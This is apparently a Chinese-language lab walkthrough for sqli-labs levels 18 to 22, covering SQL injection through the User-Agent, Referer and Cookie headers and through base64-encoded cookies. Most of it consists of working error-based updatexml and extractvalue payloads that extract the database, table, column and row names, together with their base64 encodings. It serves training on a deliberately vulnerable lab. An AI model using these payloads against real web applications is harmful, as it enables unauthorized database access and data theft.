这几关均为请求头注入,请求头记录的信息可以拼接到SQL语句上,
User-Agent ,浏览器身份标识字符串
Referer,表示浏览器访问的前一个页面,可以认为是之前访问页面的连接件浏览器带到了当前页面
Accept ,可接受的响应内容类型(Content-Type)
X-Forwarded-For, 可以用来表示http请求真实IP
Date,发送该消息的日期和时间
第十八关
暴库名
'and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1),1,1)-- q
爆表名
' and updatexml (1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security'limit 0,1),0x7e),1) -- +
爆字段名
'and updatexml (1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),0x7e),1),1,1) -- +
爆数据
'and updatexml (1,concat(0x7e,(select id from emails limit 0,1),0x7e),1),1,1) -- +
第十九关
referer注入
referer注入点
'and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) and '
'and extractvalue(1,concat(0x7e,(select database()),0x7e)) and '
除了注入点都跟上一关一样
第二十关
cookie注入
admin'and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)-- q
admin' and updatexml (1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security'limit 0,1),0x7e),1) -- +
第二十一关
Base64 在线编码解码 | Base64 加密解密 - Base64.us
base64编码
admin 'and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)-- qwe
base64编码后
YWRtaW4gJ2FuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoU0VMRUNUIGRhdGFiYXNlKCkpLDB4N2UpLDEpLS0gcXdl
报错,报错原因是空格,连字符,加号等特殊符号编码后容易出错,所以不要用注释符,得用其他语句来注释掉后面的部分 万能注释语句and'1'='1
附:关于单引号闭合的原理分析:
先看一下源码
源码中的代码:
$sql="SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1";
我们注入的SQL语句
admin 'and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) and '1'='1
由cookee变量与源码拼接后的SQL语句
$sql="SELECT * FROM users WHERE username=('admin 'and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) and '1'='1') LIMIT 0,1";
恰好闭合,OK。
常规的爆数据库名,在cookee处输入编码后的语句
admin 'and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) and '1'='1
base64编码后
YWRtaW4gJ2FuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoU0VMRUNUIGRhdGFiYXNlKCkpLDB4N2UpLDEpIGFuZCAnMSc9JzE=
successfully!!!
判断表名
admin 'and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security'limit 0,1),0x7e),1) and '1'='1
编码后
YWRtaW4gJ2FuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IHRhYmxlX25hbWUgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT0nc2VjdXJpdHknbGltaXQgMCwxKSwweDdlKSwxKSBhbmQgJzEnPScx
判断字段名
admin 'and updatexml (1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),0x7e),1) and '1'='1
YWRtaW4gJ2FuZCB1cGRhdGV4bWwgKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBjb2x1bW5fbmFtZSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX3NjaGVtYT0nc2VjdXJpdHknIGFuZCB0YWJsZV9uYW1lPSdlbWFpbHMnIGxpbWl0IDAsMSksMHg3ZSksMSkgYW5kICcxJz0nMQ==
判断数据
admin 'and updatexml (1,concat(0x7e,(select id from emails limit 0,1),0x7e),1) and '1'='1
YWRtaW4gJ2FuZCB1cGRhdGV4bWwgKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBpZCBmcm9tIGVtYWlscyBsaW1pdCAwLDEpLDB4N2UpLDEpIGFuZCAnMSc9JzE=
.... END
第二十二关
跟上一关一样,只不过为双引号闭合
admin "and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) and "1"="1
base64编码后
YWRtaW4gImFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoU0VMRUNUIGRhdGFiYXNlKCkpLDB4N2UpLDEpIGFuZCAiMSI9IjE=
按步骤来就行
admin "and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security'limit 0,1),0x7e),1) and "1"="1
编码后
YWRtaW4gImFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IHRhYmxlX25hbWUgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT0nc2VjdXJpdHknbGltaXQgMCwxKSwweDdlKSwxKSBhbmQgIjEiPSIx
admin "and updatexml (1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),0x7e),1) and "1"="1
编码后
YWRtaW4gImFuZCB1cGRhdGV4bWwgKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBjb2x1bW5fbmFtZSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX3NjaGVtYT0nc2VjdXJpdHknIGFuZCB0YWJsZV9uYW1lPSdlbWFpbHMnIGxpbWl0IDAsMSksMHg3ZSksMSkgYW5kICIxIj0iMQ==
admin "and updatexml (1,concat(0x7e,(select id from emails limit 0,1),0x7e),1) and "1"="1
编码后
YWRtaW4gImFuZCB1cGRhdGV4bWwgKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBpZCBmcm9tIGVtYWlscyBsaW1pdCAwLDEpLDB4N2UpLDEpIGFuZCAiMSI9IjE=
END!!!